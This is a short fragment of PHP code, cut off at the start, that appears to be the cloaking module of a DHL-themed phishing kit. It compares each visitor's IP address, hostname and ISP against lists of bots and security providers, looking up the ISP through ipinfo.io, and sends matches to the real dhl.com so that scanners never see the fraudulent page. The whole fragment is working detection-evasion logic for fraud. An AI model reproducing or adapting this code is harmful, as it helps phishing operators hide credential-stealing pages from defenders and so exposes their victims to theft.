0){exit(header('Location: http://www.dhl.com'));}}foreach($bots_ips as $bot_ip){if(preg_match('/'.$bot_ip.'/',$user_ip)){exit(header('Location: http://www.dhl.com'));}}foreach($blocked_words as $word){if(substr_count($hostname,$word)>0){exit(header('Location: http://www.dhl.com'));}}$ipp=isset($user_ip)&&$user_ip!=""?$user_ip:"1.1.1.1";$ISP=@file_get_contents('http://ipinfo.io/'.$ipp.'/org');if($ISP==false){return "ppp";}foreach($shit_isps as $isp){if(substr_count($ISP,$isp)){exit(header('Location: http://www.dhl.com'));}}?>